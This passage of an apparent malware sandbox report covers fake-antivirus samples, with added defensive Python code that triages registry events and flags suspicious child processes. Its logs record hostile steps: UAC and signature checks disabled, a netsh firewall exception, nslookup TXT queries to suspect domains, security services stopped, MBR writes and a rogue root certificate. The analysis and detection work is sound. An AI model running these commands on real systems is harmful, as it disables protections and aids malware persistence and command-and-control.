Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "2" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
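
The registry rows above carry the changes that matter for response: UAC is turned off (EnableLUA=0, ConsentPromptBehaviorAdmin=0) and then restored, Internet Explorer's Authenticode check on downloaded executables is disabled (CheckExeSignatures="no", RunInvalidSignatures=1), the search provider URL is pointed at findgala.com for the interactive user and for the .DEFAULT, S-1-5-19 and S-1-5-20 profiles, and the PRS value points at a loopback URL (127.0.0.1:27777, matching the local listener in the network table) with an injection placeholder. The following triage function is an added example, not part of this report: it parses rows in the report's own "Set value" format, maps each to a rule, records which hive or SID it applies to, and extracts hostnames for blocking. The sample rows are copied from the tables above with the user SID shortened; the rule names are the example's own.

```python
"""Triage registry Set-value rows of the kind this report lists (example added to the report)."""
import re
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse

# Constructed from the report's rows; the interactive user's SID is shortened to S-1-5-21-1000.
SAMPLE_EVENTS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1000\Software\Microsoft\Internet Explorer\Download\CheckExeSignatures = "no"',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-1000\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures = "1"',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1000\Software\Microsoft\Internet Explorer\PRS = "http://127.0.0.1:27777/?inj=%ORIGINAL%"',
    r'Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes\URL = "http://findgala.com/?&uid=7&q={searchTerms}"',
    r'Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes',
    r'Set value (int) \REGISTRY\USER\S-1-5-21-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode = "0"',
]

SET_VALUE_RE = re.compile(r'^Set value \((?P<type>\w+)\) (?P<path>.+?) = "(?P<value>.*)"$')


def parse_set_value(line: str) -> Optional[Dict[str, str]]:
    m = SET_VALUE_RE.match(line)
    if not m:
        return None                      # "Key created" rows and anything else are ignored here
    key, _, name = m.group("path").rpartition("\\")
    return {"key": key, "name": name, "value": m.group("value"), "type": m.group("type")}


def hive_scope(key: str) -> str:
    """HKLM, or the SID under HKU. S-1-5-19/S-1-5-20/.DEFAULT mean the change also applies to the
    LocalService/NetworkService profiles and the logon desktop, not just the interactive user."""
    if key.upper().startswith("\\REGISTRY\\MACHINE"):
        return "HKLM"
    m = re.match(r"\\REGISTRY\\USER\\([^\\]+)", key, re.IGNORECASE)
    return m.group(1) if m else "unknown"


def url_host(value: str) -> Optional[str]:
    return urlparse(value).hostname if value.lower().startswith(("http://", "https://")) else None


def check_event(ev: Dict[str, str]) -> Optional[str]:
    """Map one Set-value event to a rule name, or None if it is not interesting."""
    key_u, name_u, val = ev["key"].upper(), ev["name"].upper(), ev["value"]
    if key_u.endswith("\\POLICIES\\SYSTEM"):
        if name_u == "ENABLELUA" and val == "0":
            return "uac_disabled"
        if name_u == "CONSENTPROMPTBEHAVIORADMIN" and val == "0":
            return "uac_admin_elevates_without_prompt"
        if name_u == "CONSENTPROMPTBEHAVIORUSER" and val == "0":
            return "uac_user_elevation_auto_denied"
    if "\\INTERNET EXPLORER" in key_u:
        if name_u == "CHECKEXESIGNATURES" and val.lower() == "no":
            return "ie_download_signature_check_disabled"
        if name_u == "RUNINVALIDSIGNATURES" and val == "1":
            return "ie_download_signature_check_disabled"
        if "SEARCHSCOPES" in key_u and name_u == "URL":
            return "ie_search_provider_set"
        if url_host(val) in ("127.0.0.1", "localhost"):
            return "ie_loopback_url"       # a local proxy/injector URL like the PRS value above
    return None


def triage_registry_events(lines: List[str]) -> List[Dict[str, str]]:
    findings = []
    for line in lines:
        ev = parse_set_value(line)
        rule = check_event(ev) if ev else None
        if rule:
            findings.append({"rule": rule, "scope": hive_scope(ev["key"]), **ev})
    return findings


def extract_hosts(findings: List[Dict[str, str]]) -> Set[str]:
    """Hostnames embedded in flagged values, for blocklists and pivoting."""
    return {h for h in (url_host(f["value"]) for f in findings) if h}


if __name__ == "__main__":
    found = triage_registry_events(SAMPLE_EVENTS)
    for f in found:
        print(f'{f["rule"]:40} {f["scope"]:14} {f["name"]} = {f["value"]}')
    print("hosts:", sorted(extract_hosts(found)))
```

Two points the output makes that the raw rows do not: the EnableLUA=1 row is not flagged, so a "disable, act, restore" sequence still leaves exactly one uac_disabled finding to act on, and the scope column shows the search hijack landing in service-account profiles, which a per-user cleanup of the Admin profile would leave in place.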

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp "C:\Users\Admin\AppData\Local\Temp\Fake AV\6268.mof"

C:\Windows\SysWOW64\netsh.exe

netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe" "Internet Security Guard" ENABLE

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt diinu560ubjjsv.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt insssyfinr1275tc.net 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.8.8

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.222.222

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 8.8.4.4

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.com 208.67.220.220

C:\Windows\SysWOW64\nslookup.exe

nslookup -q=txt hppwycfjr1248swx.net 208.67.220.220
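
The process list shows one parent (PID 2528) spawning three distinct LOLBin patterns: mofcomp compiling a .mof file from the sample's own Temp directory, netsh adding a firewall exception for the sample, and 24 nslookup invocations that request TXT records for six throwaway domains from four hard-coded public resolvers (Google and OpenDNS), which bypasses whatever DNS server the host is configured to use and so also bypasses internal DNS logging. The report does not say what those TXT records contained. The detector below is an added example, not part of this report: it parses command lines in the form listed above, flags the three patterns, and groups TXT queries by parent to catch the resolver fan-out. The parent PID and the command lines are taken from the report; the child PIDs and the thresholds (at least four TXT queries across at least two resolvers) are the example's own assumptions.

```python
"""Flag the child-process pattern in this report's process list (example added to the report)."""
import re
from collections import defaultdict
from typing import Dict, List, Optional


def _nslookup_children():
    """Constructed from the 24 nslookup lines above; child PIDs are made up."""
    pid, out = 4000, []
    for label in ("diinu560ubjjsv", "insssyfinr1275tc", "hppwycfjr1248swx"):
        for resolver in ("8.8.8.8", "208.67.222.222", "8.8.4.4", "208.67.220.220"):
            for tld in ("com", "net"):
                out.append({"pid": pid, "ppid": 2528, "image": r"C:\Windows\SysWOW64\nslookup.exe",
                            "cmdline": f"nslookup -q=txt {label}.{tld} {resolver}"})
                pid += 1
    return out


# Parent PID 2528 and the command lines are the report's own; the parent's own ppid is made up.
SAMPLE_PROCESSES = [
    {"pid": 2528, "ppid": 1000, "image": r"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"'},
    {"pid": 1216, "ppid": 2528, "image": r"C:\Windows\SysWOW64\Wbem\mofcomp.exe",
     "cmdline": r'mofcomp "C:\Users\Admin\AppData\Local\Temp\Fake AV\6268.mof"'},
    {"pid": 900, "ppid": 2528, "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": r'netsh "firewall" add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe" "Internet Security Guard" ENABLE'},
] + _nslookup_children()

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
NSLOOKUP_TYPE_RE = re.compile(r"^-(?:q|query|querytype|type)=(\w+)$", re.IGNORECASE)


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths intact (quotes removed)."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_nslookup(cmdline: str) -> Optional[Dict[str, Optional[str]]]:
    """Return query type, name and explicit resolver from an nslookup command line, else None."""
    toks = tokenize(cmdline)
    if not toks or basename(toks[0]) not in ("nslookup", "nslookup.exe"):
        return None
    qtype, positional = None, []
    for t in toks[1:]:
        m = NSLOOKUP_TYPE_RE.match(t)
        if m:
            qtype = m.group(1).lower()
        elif not t.startswith("-"):
            positional.append(t)
    if not positional:
        return None
    return {"qtype": qtype, "name": positional[0].lower(),
            "resolver": positional[1] if len(positional) > 1 else None}


def detect_suspicious_children(processes: List[dict], min_queries: int = 4, min_resolvers: int = 2) -> List[dict]:
    findings = []
    txt_queries = defaultdict(list)          # parent pid -> TXT queries issued by its children
    for p in processes:
        toks = tokenize(p["cmdline"])
        image = basename(p["image"])
        if image == "mofcomp.exe":
            mofs = [t for t in toks if t.lower().endswith(".mof") and "\\temp\\" in t.lower()]
            if mofs:
                findings.append({"rule": "mof_compiled_from_temp", "pid": p["pid"],
                                 "parent_pid": p["ppid"], "mof": mofs[0]})
        if image == "netsh.exe":
            low = [t.lower() for t in toks]
            if "allowedprogram" in low and low.index("allowedprogram") + 1 < len(toks):
                findings.append({"rule": "firewall_exception_added", "pid": p["pid"],
                                 "parent_pid": p["ppid"], "program": toks[low.index("allowedprogram") + 1]})
        q = parse_nslookup(p["cmdline"])
        if q and q["qtype"] == "txt":
            txt_queries[p["ppid"]].append(q)
    for ppid, qs in txt_queries.items():
        resolvers = {q["resolver"] for q in qs if q["resolver"]}
        if len(qs) >= min_queries and len(resolvers) >= min_resolvers:
            findings.append({"rule": "dns_txt_fanout", "parent_pid": ppid, "count": len(qs),
                             "domains": sorted({q["name"] for q in qs}), "resolvers": sorted(resolvers)})
    return findings


if __name__ == "__main__":
    for f in detect_suspicious_children(SAMPLE_PROCESSES):
        print(f)
```

Grouping by parent rather than alerting on each nslookup is what keeps this usable on a real fleet, where a single `nslookup -q=txt` from an administrator is noise but two dozen from one non-system parent against four external resolvers is not; the domains list from the fan-out finding is the set to feed into passive-DNS pivoting.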

Network

Country Destination Domain Proto
US 74.82.198.254:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
US 8.8.8.8:53 www5.internet-security-guard.com udp
US 8.8.8.8:53 secure1.safe-scanerwas.com udp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
US 8.8.8.8:53 secure2.simplenetworkzqi.com udp
US 74.82.198.254:80 tcp
SG 76.73.19.181:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 diinu560ubjjsv.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 diinu560ubjjsv.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 208.67.222.222:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 diinu560ubjjsv.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 8.8.4.4:53 diinu560ubjjsv.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 diinu560ubjjsv.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 208.67.220.220:53 diinu560ubjjsv.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 insssyfinr1275tc.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 208.67.222.222:53 insssyfinr1275tc.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 208.67.222.222:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 insssyfinr1275tc.com udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 8.8.4.4:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 insssyfinr1275tc.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 208.67.220.220:53 insssyfinr1275tc.net udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 hppwycfjr1248swx.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 8.8.8.8:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 hppwycfjr1248swx.com udp
US 208.67.222.222:53 222.222.67.208.in-addr.arpa udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 208.67.222.222:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
US 8.8.4.4:53 hppwycfjr1248swx.com udp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 8.8.4.4:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 8.8.4.4:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 hppwycfjr1248swx.com udp
US 208.67.220.220:53 220.220.67.208.in-addr.arpa udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 208.67.220.220:53 hppwycfjr1248swx.net udp
US 74.82.198.253:80 tcp
US 74.82.198.253:80 tcp
SG 76.73.19.181:80 tcp
US 74.82.198.254:80 tcp
US 74.82.198.253:80 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
N/A 127.0.0.1:27777 tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
FR 46.105.131.122:80 report2.ogpertblethagahert.net tcp
US 74.82.198.254:80 tcp
US 74.82.198.253:80 tcp

Files


Analysis: behavioral4

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

32s

Max time network

39s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

Signatures

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe N/A

UPX packed file

upx

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\physicaldrive0 C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\authzi.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\30530A0C86EDB1CD5A2A5FE37EF3BF28E69BE16D\Blob = [certificate blob omitted from report] C:\Users\Admin\AppData\Local\Temp\AV.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DB.EXE N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SB.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4168 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV.EXE
PID 4168 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\AV2.EXE
PID 4168 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\DB.EXE
PID 4168 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\EN.EXE
PID 4168 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe C:\Users\Admin\AppData\Local\Temp\SB.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Ana.exe"

C:\Users\Admin\AppData\Local\Temp\AV.EXE

"C:\Users\Admin\AppData\Local\Temp\AV.EXE"

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

"C:\Users\Admin\AppData\Local\Temp\AV2.EXE"

C:\Users\Admin\AppData\Local\Temp\DB.EXE

"C:\Users\Admin\AppData\Local\Temp\DB.EXE"

C:\Users\Admin\AppData\Local\Temp\EN.EXE

"C:\Users\Admin\AppData\Local\Temp\EN.EXE"

C:\Users\Admin\AppData\Local\Temp\SB.EXE

"C:\Users\Admin\AppData\Local\Temp\SB.EXE"

C:\Windows\SysWOW64\cmd.exe

/c C:\Users\Admin\AppData\Local\Temp\~unins9125.bat "C:\Users\Admin\AppData\Local\Temp\DB.EXE"

Network

Country Destination Domain Proto

Files


Analysis: behavioral6

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

152s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus = "\"C:\\Program Files (x86)\\AnVi\\avt.exe\" -noscan" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\wbem\repository\MAPPING2.MAP C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\MAPPING3.MAP C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\OBJECTS.DATA C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\INDEX.BTR C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\WRITABLE.TST C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\wbem\repository\MAPPING1.MAP C:\Windows\system32\svchost.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\AnVi\splash.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
File created C:\Program Files (x86)\AnVi\virus.mp3 C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\mofcomp.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3104 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\net.exe
PID 3104 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe C:\Windows\SysWOW64\Wbem\mofcomp.exe
PID 1056 wrote to memory of 2120 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1032 wrote to memory of 4984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4480 wrote to memory of 4832 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4800 wrote to memory of 764 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus.exe"

C:\Windows\SysWOW64\net.exe

net stop wscsvc

C:\Windows\SysWOW64\net.exe

net stop winmgmt /y

C:\Windows\SysWOW64\net.exe

net start winmgmt

C:\Windows\SysWOW64\net.exe

net start wscsvc

C:\Windows\SysWOW64\Wbem\mofcomp.exe

mofcomp C:\Users\Admin\AppData\Local\Temp\4otjesjty.mof

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop winmgmt /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 highway-traffic.com udp
US 8.8.8.8:53 searchdusty.com udp
CA 54.39.157.64:80 searchdusty.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 fastsofgeld.com udp
US 8.8.8.8:53 frequentwin.com udp
US 8.8.8.8:53 64.157.39.54.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
